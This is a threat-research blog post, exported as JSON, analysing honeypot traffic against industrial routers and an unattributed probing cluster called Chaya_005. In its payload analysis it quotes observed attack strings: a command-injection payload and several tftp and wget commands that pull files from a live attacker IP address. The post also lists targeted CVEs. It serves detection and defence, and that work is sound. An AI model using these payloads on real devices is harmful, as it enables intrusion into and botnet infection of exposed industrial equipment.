{"id":109984,"date":"2025-12-11T08:00:03","date_gmt":"2025-12-11T13:00:03","guid":{"rendered":"https:\/\/forescoutstage.wpengine.com\/?p=109984"},"modified":"2025-12-10T20:09:53","modified_gmt":"2025-12-11T01:09:53","slug":"ot-network-security-threats-industrial-routers-under-attack","status":"publish","type":"post","link":"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/","title":{"rendered":"OT Network Security Threats: Industrial Routers Under Attack"},"content":{"rendered":"<p>In September, the pro-Russian hacktivist group TwoNet <a href=\"https:\/\/www.forescout.com\/blog\/anatomy-of-a-hacktivist-attack-russian-aligned-group-targets-otics\/\">compromised the human-machine interface (HMI)<\/a> of the water treatment honeypot in our <a href=\"https:\/\/www.forescout.com\/research-labs\/threat-intelligence\/\">Adversary Engagement Environment (AEE)<\/a>.<\/p>\n<p>Hacktivists are increasingly compromising and defacing HMIs via manual exploits, but other exposed IoT and OT assets, such as IP cameras, PLCs, and routers are also frequently attacked. How are they targeted? By <a href=\"https:\/\/www.forescout.com\/blog\/targeting-ot-security-ics-threats-malware\/\">automated scanners, botnets, and other malicious activity<\/a>.<\/p>\n<p>Here, we analyze 90 days of activity within our honeypots to show the kind of OT security threats constantly being faced. 
This helps us better understand the type of devices under attack while capturing unique attack behavior, so asset owners can better mitigate these risks.<\/p>\n<p>The most relevant finding in the analysis period was a cluster we named Chaya_005, which started with a successful exploit against a Sierra Wireless router, but then mixed malformed exploits for other edge devices.<\/p>\n<p>&nbsp;<\/p>\n<h2>Overall Statistics<\/h2>\n<p>For this analysis, we split the AEE assets in three categories:<\/p>\n<ul>\n<li>\u2018<strong>OT Perimeter<\/strong>\u2019 containing four edge devices: three <a href=\"https:\/\/www.forescout.com\/research-labs\/ot-iot-routers-in-the-software-supply-chain\/\">industrial wireless routers<\/a> and an industrial firewall, all from different popular vendors.<\/li>\n<li>\u2018<strong>Exposed OT<\/strong>\u2019 containing four assets that should not be exposed online: three PLCs, and a webserver with the HMI that was defaced by TwoNet.<\/li>\n<li>\u2018<strong>Others<\/strong>\u2019 containing an IP camera, a medical device and an IT VPN router common in small and medium businesses. This category is just used for comparison with the OT assets.<\/li>\n<\/ul>\n<p>Over 90 days, these 11 devices received over 60 million requests flagged by our intrusion detection system (IDS), for an average of eight per second. 
Across all three categories, this data point immediately stands out: <strong>97% of interactions were SNMP requests<\/strong> and <strong>95% were directed at the firewall<\/strong>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109995\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined.jpg\" alt=\"\" width=\"1250\" height=\"506\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined.jpg 1250w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined-300x121.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined-1024x415.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/01-Requests-per-Protocol-and-02-Device-graph-combined-768x311.jpg 768w\" sizes=\"auto, (max-width: 1250px) 100vw, 1250px\" \/><\/p>\n<p>Out of these, 99.9% were requests to object identifier (OID) 1 \u2013 the root of the entire SNMP OID tree \u2013 or 1.3.6.1 \u2013 the root of the internet subtree. The intention of these scans was likely the basic fingerprinting of devices, but since these are not leaf nodes, the returned content depends on the SNMP agent and it may be an error.<\/p>\n<p>Therefore, we removed SNMP requests for our further analysis which left us with roughly 3.5 million events. 
These were more evenly distributed per device as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109996\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device.jpg\" alt=\"\" width=\"1070\" height=\"716\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device.jpg 1070w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device-300x201.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device-1024x685.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/03-Requested-per-Device-768x514.jpg 768w\" sizes=\"auto, (max-width: 1070px) 100vw, 1070px\" \/><\/p>\n<p>The firewall still stood out as the most targeted device when counting both total interactions and unique IP addresses. That device was followed by one of the OT routers, the IP camera, and then another OT router.<\/p>\n<p>The figure below shows more clearly that when focusing on OT only (i.e. 
excluding the \u2018Others\u2019 category), <strong>the OT perimeter captured two thirds of requests versus one third for exposed OT<\/strong>:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109997\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph.jpg\" alt=\"\" width=\"846\" height=\"671\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph.jpg 846w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph-300x238.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/04-Requests-per-Asset-Category-graph-768x609.jpg 768w\" sizes=\"auto, (max-width: 846px) 100vw, 846px\" \/><\/p>\n<p>Therefore, we focus the rest of the analysis on the events that targeted the edge devices.<\/p>\n<p>&nbsp;<\/p>\n<h2>Attacks on the OT Perimeter<\/h2>\n<p>The events targeting the OT perimeter were distributed per protocol as shown below. SSH and Telnet accounted for 72% of the requests and those were mainly brute force authentication attempts. HTTP and HTTPS accounted for 24%. The \u2018Others\u2019 category accounted for 4% of requests which were generally irrelevant since the devices would not respond to them anyway. 
This category contains mostly SIP and DNS, followed by a multitude of others, including TFTP, SMB, Modbus, MQTT, and IKE.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109998\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/05-Requests-per-Protocol-OT-Edge-Devices-graph.jpg\" alt=\"\" width=\"667\" height=\"530\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/05-Requests-per-Protocol-OT-Edge-Devices-graph.jpg 667w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/05-Requests-per-Protocol-OT-Edge-Devices-graph-300x238.jpg 300w\" sizes=\"auto, (max-width: 667px) 100vw, 667px\" \/><\/p>\n<p>For Telnet and SSH connections, the figure below shows the most used credentials (usernames and passwords). All the top 20 credentials are present in a <a href=\"https:\/\/krebsonsecurity.com\/wp-content\/uploads\/2016\/10\/IoTbadpass-Sheet1.pdf\">list of default IoT credentials<\/a> that has been circulating online since 2016 and is shared across many botnets and scanners, except for \u2018service\u2019 which is a generic brute force attempt.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-109999\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph.jpg\" alt=\"\" width=\"1108\" height=\"709\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph.jpg 1108w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph-300x192.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph-1024x655.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/06-Top-Attempted-Credentials-bar-graph-768x491.jpg 768w\" sizes=\"auto, (max-width: 1108px) 100vw, 1108px\" \/><\/p>\n<p>Most of these credentials do not apply to any device in the AEE, although 
some use default weak combinations, such as root\/admin. <strong>So there is a risk of compromise from automated botnets when using weak passwords \u2013 which has been known for <\/strong><a href=\"https:\/\/www.cisa.gov\/news-events\/ics-alerts\/ics-alert-16-286-01\" target=\"_blank\" rel=\"noopener\"><strong>almost a decade<\/strong><\/a><strong>.<\/strong><\/p>\n<p>Things start to get more interesting when we look into HTTP requests. The vast majority of POST and GET requests were either benign indexing (such as \u201c<code>\/<\/code>\u201d or \u201c<code>\/robots.txt<\/code>\u201d ) or potentially malicious attempts to scan device webservers for specific files, such as \u201c<code>\/php\/login.php<\/code>\u201d. But among these requests, there were almost 3,000 that we could map to attempted vulnerability exploitations used to contact external servers, typically to download malware into a device.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110000\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/07-HTTP-requests-per-method-graph.jpg\" alt=\"\" width=\"709\" height=\"647\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/07-HTTP-requests-per-method-graph.jpg 709w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/07-HTTP-requests-per-method-graph-300x274.jpg 300w\" sizes=\"auto, (max-width: 709px) 100vw, 709px\" \/><\/p>\n<p>Once again, most of those requests would not be valid for the devices in the AEE, as they were automatically attempted by botnets against potentially any IP address without prior fingerprinting. 
The most relevant attempted exploitations in this category were against the following CVEs:<\/p>\n<ul>\n<li>CVE-2024-12856 against Four-Faith industrial routers, not a device that was part of this analysis.<\/li>\n<li>CVE-2024-0012, CVE-2024-9474 and CVE-2025-0108 against several versions of PAN OS, but not the version running on the AEE firewall.<\/li>\n<\/ul>\n<p>The 3,000 malicious requests were distributed per malware family as follows:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110001\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware.jpg\" alt=\"\" width=\"860\" height=\"625\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware.jpg 860w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware-300x218.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/08-Most-Common-Malware-768x558.jpg 768w\" sizes=\"auto, (max-width: 860px) 100vw, 860px\" \/><\/p>\n<p>Aside from the <a href=\"https:\/\/www.forescout.com\/blog\/new-redtail-malware-exploited-via-php-security-vulnerability\/\">Redtail cryptominer<\/a> and the Chaya_005 cluster (which we will detail below and could not map to known activity), all others are DDoS or proxy botnets. Two are particularly noteworthy:<\/p>\n<ul>\n<li><strong>RondoDox<\/strong> is a relatively new botnet first spotted around May. It has been <a href=\"https:\/\/www.darkreading.com\/endpoint-security\/rondodox-botnet-exploit-edge-vulns\" target=\"_blank\" rel=\"noopener\">quickly adding new exploits to its arsenal<\/a>. It now counts over 50 vulnerabilities on IoT devices. Several have no assigned CVE identifiers. This \u2018shotgun\u2019 approach to exploitation seems to be working: it was the most active botnet we noticed in these 90 days by far. 
<strong>If the botnet adds known vulnerabilities for industrial edge devices, this could become risky for asset owners very quickly.<\/strong><\/li>\n<li><strong>ShadowV2<\/strong> is even newer. It was first spotted in June and is already the third most common botnet in our analysis. The same risk considerations apply for asset owners, even though it mostly targets D-Link and TP-Link routers. This botnet hasn\u2019t been adding as many exploits as RondoDox.<\/li>\n<\/ul>\n<p>These malware families share a common infection method: they exploit HTTP vulnerabilities, such as command injections and path traversals, to execute a command that reaches a server and downloads a binary, which is then executed on the infected device. That binary will then try to infect other devices and continue the cycle. The IP addresses observed as downloaders in this 90-day period are reported in the IoC section.<\/p>\n<p>&nbsp;<\/p>\n<h2>Chaya_005: Fingerprinting Vulnerable Edge Devices<\/h2>\n<p>Following our <a href=\"https:\/\/www.forescout.com\/blog\/ics-threat-analysis-new-experimental-malware-can-kill-engineering-processes\/\">naming convention<\/a> for activity clusters that are not attributed to any known threat actor or region, we named this cluster of requests Chaya_005.<\/p>\n<p>Chaya_005 originally consisted of 70 HTTP POST requests between October 22 and December 3, 2025, all originating from IP address <code>31.57.243.170<\/code> and all directed at \u201c<code>\/xml\/Connect.xml<\/code>\u201d. This URL is a valid endpoint on the router that was being targeted (a Sierra Wireless LS300, which reached end-of-support in December 2021).<\/p>\n<p>Although the target and endpoint were a valid combination, the exploit was incorrectly using several variations of: \u201c<code>action=login&amp;kPath=&lt;payload&gt;&amp;loginUser=admin&amp;loginPwd=pass<\/code>\u201d. 
The closest thing we could find for this request was an <a href=\"https:\/\/www.exploit-db.com\/exploits\/48268\" target=\"_blank\" rel=\"noopener\">exploit for CVE-2020-8515<\/a> affecting DrayTek routers. However, the vulnerable parameter should be \u201c<code>keyPath<\/code>\u201d instead of \u201c<code>kPath<\/code>\u201d. Even with the correct parameter, this would not work against the Sierra Wireless router.<\/p>\n<p>Even though the exploit was incorrect, the payloads were interesting. There were several versions of: <code>%27%0Awget%20http%3A\/\/31.57.243.170\/SW068F8861C11312F%0A%27<\/code> where, instead of wget, the attackers tried tftp, ftpget, curl, and other utilities. All variations did the same: attempt to contact the server on <code>31.57.243.170<\/code> using either HTTP or FTP.<\/p>\n<p>&nbsp;<\/p>\n<h2>Payload Analysis<\/h2>\n<p>All payload versions carried a signature resembling the one shown above: <code>SW068F8861C11312F<\/code>. It is common for botnets to use seemingly random names for the files downloaded from a server, so that was our first assumption. However, we could never download any file from that server.<\/p>\n<p>These signatures had more distinctive patterns than required for a filename. By analyzing the 70 originally available examples and others obtained from the pivoting we will describe below, we found the following patterns:<\/p>\n<ul>\n<li>The first character can be either S or B. This informs the attacker whether the command has been run directly in the shell (S) or via busybox (B).<\/li>\n<li>The second character can be either T, F, C, or W depending on the utility: (T)ftp, (F)tpget, (C)url, or (W)get, respectively.<\/li>\n<li>The third character can be either 0, 1, or 2. 
It is only meaningful for tftp and indicates which form of the command was used:\n<ul>\n<li>ST0 corresponds to \u201c<code>tftp 31.57.243.170 -c get &lt;signature&gt;<\/code>\u201d<\/li>\n<li>ST1 corresponds to \u201c<code>tftp -r &lt;signature&gt; -g 31.57.243.170<\/code>\u201d<\/li>\n<li>ST2 corresponds to \u201c<code>echo get 31.57.243.170:&lt;signature&gt; | tftp<\/code>\u201d<\/li>\n<\/ul>\n<\/li>\n<li>The next eight characters are a hex representation of the timestamp for the request. For instance, in <code>ST167913F7A1362D2<\/code>, the hexadecimal characters \u201c<code>67913F7A<\/code>\u201d represent \u201c<code>1737572218<\/code>\u201d in decimal, which, read as a UNIX epoch timestamp, corresponds to Wednesday, January 22, 2025, 6:56:58 PM GMT.<\/li>\n<li>We could not fully decode the last six characters. They may be a random number to identify the session. We saw identical signatures coming from the same IP address, at the same time, against the same device, whose only difference was the attacked port (9443 vs 9119). A few days later, the same attack patterns, differing only in time, resulted in a different signature.<\/li>\n<\/ul>\n<p>During the scans, the IP address <code>31.57.243.170<\/code> was running a vsFTPd 3.0.3 server on port 21 and an unspecified HTTP server on port 80. The HTTP server returned error 404 (\u201cnot found\u201d) even for the root path.<\/p>\n<p>Based on the characteristics of the payload signature and the server, we believe these requests were used to probe the capabilities available in target systems. 
If a request was successful \u2013 meaning the device was vulnerable \u2013 the attacker would have an entry in their HTTP\/FTP logs telling them which system was vulnerable to which kind of command execution, and when the test worked.<\/p>\n<p>This kind of capability is not typical DDoS botnet behavior, but it may be useful to maintain an inventory of devices that can later be exploited for a particular reason, such as to download a botnet, cryptominer, residential proxy, or other malicious software to the target.<\/p>\n<p>&nbsp;<\/p>\n<h2>Pivoting on the Payload<\/h2>\n<p>When we searched for similar payload signatures within previous timeframes, we saw that the type of request associated with Chaya_005 has been happening for at least two years \u2013 with the same behavior initiated from several other IP addresses \u2013 targeting different endpoints of multiple devices, not limited to Sierra Wireless. This figure summarizes these other clusters:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110002\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/08\/09-Payload-Diagram-V2.jpg\" alt=\"\" width=\"2094\" height=\"861\" \/><\/p>\n<p>We kept clusters 1-5 under the Chaya_005 umbrella because of the unique payload signatures, rather than because of device targeting or specific CVEs.<\/p>\n<p>Although most IP addresses used in clusters 1-4 were no longer active, it was interesting to see that the IP address used in cluster 5 had previously been used for cluster 2 (almost a year before). 
The IP address of cluster 4 (<code>79.141.172.211<\/code>) still had an almost identical configuration as the IP address of cluster 5 at the end of November, shown in the figures below.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110009\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses.jpg\" alt=\"\" width=\"1381\" height=\"1167\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses.jpg 1381w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses-300x254.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses-1024x865.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10a-ip-addresses-768x649.jpg 768w\" sizes=\"auto, (max-width: 1381px) 100vw, 1381px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110010\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses.jpg\" alt=\"\" width=\"1570\" height=\"1150\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses.jpg 1570w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-300x220.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-1024x750.jpg 1024w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-768x563.jpg 768w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-10b-ip-addresses-1536x1125.jpg 1536w\" sizes=\"auto, (max-width: 1570px) 100vw, 1570px\" \/><\/p>\n<p>Only on the first cluster, the attackers were successful with an exploit. 
At that time, they used payloads to exploit CVE-2018-4063 on our Sierra Wireless router, as shown in this figure.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-110004\" src=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads.jpg\" alt=\"\" width=\"903\" height=\"377\" srcset=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads.jpg 903w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads-300x125.jpg 300w, https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-11-exploit-payloads-768x321.jpg 768w\" sizes=\"auto, (max-width: 903px) 100vw, 903px\" \/><\/p>\n<p>This first cluster may have been a manual exploitation attempt because the attacker rotated three different IP addresses in the first nine days. This is the only instance where the exploit is well-formed and targets the correct device. In all other clusters, there were attempts against endpoints of other edge devices (DrayTek and Cisco IOS XE) with exploit payloads that did not match the actual target.<\/p>\n<p>We also searched for similar payload signatures on public repositories and found at least two instances submitted to VirusTotal. 
This means our honeypot was not the only target:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/url\/1375b9907f3ab408582d3c8893649bc86b8edd5803df8e937e319372db159e7a\" target=\"_blank\" rel=\"noopener\">https:\/\/www.virustotal.com\/gui\/url\/1375b9907f3ab408582d3c8893649bc86b8edd5803df8e937e319372db159e7a<\/a> &#8211; <code>http:\/\/31.57.243[.]170\/BC067EFEB001FA990<\/code> submitted from Israel on April 10, 2025 although the timestamp \u201c<code>67EFEB00<\/code>\u201d corresponds to April 4, 2025<\/li>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/url\/f43874dfff0ae0dcaf73f6393d4ea52464aff8030e6d3289dcac46d7e40664bc\/telemetry\" target=\"_blank\" rel=\"noopener\">https:\/\/www.virustotal.com\/gui\/url\/f43874dfff0ae0dcaf73f6393d4ea52464aff8030e6d3289dcac46d7e40664bc\/telemetry<\/a> &#8211; <code>http:\/\/51.210.138[.]92\/SW065DF14194C4223<\/code> submitted from Poland on March 4, 2024 although the timestamp \u201c<code>65DF1419<\/code>\u201d corresponds to February 28, 2024<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>Summary Assessment<\/h2>\n<p>We cannot precisely identify what is behind Chaya_005. It could even be \u2018non-malicious\u2019 scans from researchers or a legitimate company, although that is unlikely. The real exploits would be unethical at minimum.<\/p>\n<p>Chaya_005 appears to be a broader reconnaissance campaign testing multiple vendor vulnerabilities rather than focusing on a single one. So far, we only observed successful exploitation in cluster 1 for Sierra Wireless CVE-2018-4063. Even so, there are a few characteristics that made Chaya_005 stand out to us:<\/p>\n<ul>\n<li>The attempted exploits mix activity seen in other botnets (e.g., CVE-2020-8515 on Draytek) and activity not previously associated with known malware (e.g., CVE-2018-4063).<\/li>\n<li>We never saw any file stored or downloaded on the contacted servers.<\/li>\n<li>We never saw port scan activity from the IP addresses used in Chaya_005. 
This indicates that the attackers preemptively built a list of potential candidates either from a separate scanning infrastructure or from public repositories like Shodan.<\/li>\n<li>We never saw subsequent activity or attempts to exploit different devices. This indicates that the activity originates from scanning infrastructure focused exclusively on edge devices, despite the singular behavior of using malformed exploits for the most part.<\/li>\n<li>The IP address active in October-December 2025 (<code>31.57.243.170<\/code>) had been used for the same scans almost a year before which is not typical for a botnet infection.<\/li>\n<li>The IP addresses used in the attacks did not seem to be infected by botnets when targeting our systems. We did not see unrelated requests on our honeypots and could not find third-party threat intelligence indicating that they were targeting others.<\/li>\n<li>The closest potentially related activity we could find was from the <a href=\"https:\/\/www.trendmicro.com\/en\/research\/24\/k\/water-barghest.html\" target=\"_blank\" rel=\"noopener\">Water Barghest<\/a> intrusion set:\n<ul>\n<li>IP address <code>51.210.138.92<\/code> was part of Chaya_005 cluster 1 on Jan 8 and Jan 29, 2024 and hit a target in Poland on February 28, 2024. In between these two activities, on February 1, the same IP address was serving <a href=\"https:\/\/www.virustotal.com\/gui\/file\/892eb161254733cf5923313544e923fface375c27b3dcf8f66e79da84c93cf65\" target=\"_blank\" rel=\"noopener\">a file<\/a> on <code>http:\/\/51.210.138[.]92\/QSAE<\/code>. This file (also seen with several other four-letter names such as BHLS, MYFM and DPBW) is the Ngioweb botnet associated with Water Barghest.<\/li>\n<li>IP address <code>185.45.195.12<\/code> is in the same subnet as <code>45.195.14<\/code> that was part of Chaya_005 cluster 3 between December 16, 2024 and January 20, 2025. 
The address ending in 12 was seen serving the same <code>Ngioweb<\/code> file on November 11, 2023 (a year prior to the Chaya_005 activity). Although the IP addresses are \u201cclose\u201d, the time difference makes this point less relevant than the first one.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>We do not believe that Chaya_005 is currently a significant threat because we have not seen evidence of successful exploitation after cluster 1. Still, since Sierra Wireless routers are very popular and can <a href=\"https:\/\/www.shodan.io\/search?query=ssl%3A%22sierra+wireless%22\" target=\"_blank\" rel=\"noopener\">still often be found with HTTP management interfaces online<\/a>, it is important for asset owners to pay attention.<\/p>\n<p>While legacy devices may remain vulnerable, the combination of available patches, product obsolescence, and network retirement contextualizes the actual threat landscape:<\/p>\n<ul>\n<li>CVE-2018-4063 is a six-year-old patched vulnerability in an end-of-support product<\/li>\n<li>As a 3G-only device, LS300 connectivity is limited by carrier network sunsets (completed in North America in 2022, progressing globally), which will reduce the population of remotely exploitable devices<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>Conclusion and Mitigation Recommendations<\/h2>\n<p>The key takeaway from this research is that OT perimeter devices receive more attention from automated attacks than the unintentionally exposed OT. Although most activity on those devices is either not malicious or not successful exploitation, there are risks: weak credentials, specific exploits being added to botnets, and malicious infrastructure used for probing specific devices.<\/p>\n<p>Another important takeaway is that automated threats do not differentiate between IT and OT devices. Even on OT devices, there were several brute force and exploitation attempts using IT credentials or vulnerabilities. 
Similarly, in the past we have <a href=\"https:\/\/www.forescout.com\/blog\/targeting-ot-security-ics-threats-malware\/\">reported IoT botnets that packed OT-specific credentials<\/a>.<\/p>\n<p>Rather than looking at these events as meaningless or ineffective attacks, it\u2019s important for asset owners to think about the increasing connectivity and different types of devices in their networks.<\/p>\n<p>Consider the <a href=\"https:\/\/sektorcert.dk\/wp-content\/uploads\/2023\/11\/SektorCERT-The-attack-against-Danish-critical-infrastructure-TLP-CLEAR.pdf\" target=\"_blank\" rel=\"noopener\">Mirai botnet infections in the Danish power sector<\/a> that led to companies going into island mode: those started from \u2018IT\u2019 Zyxel firewalls used in the OT perimeter. When we analyzed those events in early 2024, we noticed a similar pattern throughout critical infrastructure, especially in Europe. Considering threats \u2018IT-only\u2019 or \u2018OT-only\u2019 can be dangerous. Securing both IT and OT together is fundamental.<\/p>\n<p>To safeguard OT environments, we recommend the following measures:<\/p>\n<ul>\n<li><strong>Harden OT Devices. <\/strong>Identify all devices connected to your network, assess their open ports and credentials, and ensure that default or easily guessable credentials are changed. Disable any unused services to minimize attack surface.<\/li>\n<li><strong>Segment the Network. <\/strong>Avoid directly exposing OT devices to the internet. Properly segment networks to isolate IT, IoT and OT devices, limiting network connections to only authorized management and engineering workstations or to unmanaged devices that need to communicate with each other.<\/li>\n<li><strong>Monitor for Threats. <\/strong>Implement IoT\/OT-aware monitoring solutions that can detect malicious indicators and behaviors. 
This includes flagging the use of blacklisted credentials and unauthorized OT protocol activity within your network.<\/li>\n<\/ul>\n<h3>IoCs<\/h3>\n<p>Indicators of Compromise (IoCs) including IP addresses and others not listed here for brevity, such as file hashes, are available on the <a href=\"https:\/\/forescout.vederelabs.com\/register\" target=\"_blank\" rel=\"noopener\">Forescout Research \u2013 Vedere Labs threat feed<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.<\/p>\n","protected":false},"author":124,"featured_media":109986,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"ep_exclude_from_search":false,"footnotes":"","_links_to":"","_links_to_target":""},"categories":[540],"tags":[],"coauthors":[542],"class_list":["post-109984","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research-and-cyber-alerts"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>OT Network Security Threats: Industrial Routers Under Attack<\/title>\n<meta name=\"description\" content=\"Industrial routers face escalating botnet attacks. Our honeypot analysis reveals emerging OT network security threats targeting edge devices.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"OT Network Security Threats: Industrial Routers Under Attack\" \/>\n<meta property=\"og:description\" content=\"Industrial routers face escalating botnet attacks. 
Our honeypot analysis reveals emerging OT network security threats targeting edge devices.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.forescout.com\/blog\/ot-network-security-threats-industrial-routers-under-attack\/\" \/>\n<meta property=\"og:site_name\" content=\"Forescout\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ForescoutTechnologies\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-11T13:00:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"628\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"Forescout Research - Vedere Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Forescout\" \/>\n<meta name=\"twitter:site\" content=\"@Forescout\" \/>\n<meta name=\"twitter:label1\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"16 minutes\" \/>\n<!-- \/ Yoast SEO plugin. -->","featured_media_url":"https:\/\/www.forescout.com\/wp-content\/uploads\/2025\/12\/industrial-routers-blog-feature.webp","is_file":false,"excerpt_manually_set":true}